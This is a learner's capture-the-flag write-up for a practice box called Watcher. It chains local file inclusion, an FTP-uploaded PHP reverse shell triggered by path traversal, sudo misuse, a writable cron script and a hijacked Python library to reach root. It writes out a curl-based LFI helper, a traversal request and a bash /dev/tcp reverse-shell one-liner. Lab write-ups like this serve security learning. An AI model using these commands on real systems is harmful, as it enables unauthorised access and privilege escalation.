Before starting, all of the challenges posted here are included in my learning journey. I didn’t solve them all, if I searched or learned from other senpais, I will reference them all.
Ideas:
- Recon with nmap & find LFI vulnerability “post.php?post=”
- Creating one-line command to interact with the vulnerable parameter
- Read secret_*.txt and find password for ftpuser
- LFI + VSFTPD -> RCE
- Escalate to user toby
- Shell as user mat
- Shell as user will
- Shell as root
# RECON
Starting with: nmap -sV -sC -A -vvv -T4 -oN nmap/output watcher.thm
There are three opened ports. Normally, I could start with ftp to see if it allowed anonymous login, which it did not in this case. Therefore, I moved on and have a look at website running on port 80. Here are two interesting things that really caught my attention.
# FLAG 1
1. /robots.txt (This is the common directory that everyone recommend to check it first when come to a website)
I found flag_1.txt.
and secret_file_do_not_read.txt.
I could not read it, keep that in mind and we moved on :).
2. /post.php?post=striped.php
Now, let’s throw bunch of characters into the parameter to see if it’s vulnerable with SQL Injection, SSRF or LFI.
It was vulnerable with LFI.
# FLAG 2
Up to now, I personally prefer to create one-line bash command to automate a repetitive work. (This is not necessary !):
lfi(){ while true; do read -p “payload> “ lfi; curl -s http://watcher.thm/post.php?post=php://filter/convert.base64-encode/resource=${lfi} | cut -d$’\n’ -f 70 | sed ‘s/<\/div>//’ | tr -d [[:space:]] | base64 -d; done };lfi
Tried to logged in as ftpuser:
flag_2.txt
# SHELL AS www-data & FLAG 3
The idea to get a reverse shell is that: LFI + VSFTPD = RCE.
- Upload reverse shell to ftp.
- Utilizing LFI vulnerability to trigger reverse shell.
1. Upload a shell to ftp.
[ http://pentestmonkey.net/tools/web-shells/php-reverse-shell ]
2. Trigger the shell.
or
curl -s “http://watcher.thm/post.php?post=../../../../../../../home/ftpuser/ftp/files/sh.php".
flag_3.txt was stored in /var/www/html/more_secrets_a9f10a directory.
# SHELL AS USER toby & FLAG 4
Enumeration:
sudo -l (sudo, id, crontab, ls -al /home, suid are some of the top commands for a quick win)
sudo -u toby /bin/bash
and flag_4.txt
# SHELL AS USER mat & FLAG 5
Enumeration:
There is a note.txt in toby’s home directory. Let’s have a look at it.
Mat left us a hint of how to escalate to his shell !
I had a write permission on /home/toby/jobs/cow.sh. Now, I can inject a reverse shell to this script and wait for it to execute.
echo “bash -c ‘bash -i >& /dev/tcp/[YOUR_IP]/[YOUR_PORT] 0>&1’” > /home/toby/jobs/cow.sh
On the attacker box, setup a nc listener and wait for the reverse connection
Easily, we could find the flag_5.txt
# SHELL AS USER will & FLAG 6
Enumeration: user mat can run sudo … as user will.
Let’s have a look at the will_script.py to see what it does.
In summary, it takes our input and check to see if the input is in whitelist, then exit if it isn’t or execute if it is.
Let’s have a look at the other script, cmd.py. (Sorry, I messed up a little bit when I was in the box …)
For example, if our input is 2, when execute the sudo command, it will return something like this.
Here, I have a write permission on cmd.py, which means I can efficiently control the will_script.py since it use cmd.py as a library and this also means, I can modify the code to make it execute before will_script.py validate my input.
Run the script again and get shell as will.
# SHELL AS root & FLAG 7
User will belonged to adm group, we can utilize find command to find all the files which are belonged to the adm group
From the output, key.64 is root’s ssh private key is encoded in base64, decode it and ssh into the box as root!
flag_7.txt
P/s: Thanks for spending time reading this post, I’m new and still learning, so I’m happy to hear from you and your contributions.
